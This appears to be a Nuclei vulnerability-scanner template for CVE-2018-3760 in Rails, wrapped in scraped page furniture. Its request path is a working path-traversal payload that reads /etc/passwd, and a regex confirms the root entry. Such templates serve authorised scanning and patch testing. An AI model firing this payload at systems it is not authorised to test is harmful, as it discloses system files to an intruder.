23 lines
386 B
YAML
23 lines
386 B
YAML
id: CVE-2018-3760
|
|
|
|
info:
|
|
name: Rails CVE-2018-3760
|
|
author: 0xrudra
|
|
severity: high
|
|
tags: cve,cve2018,rails,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
part: body
|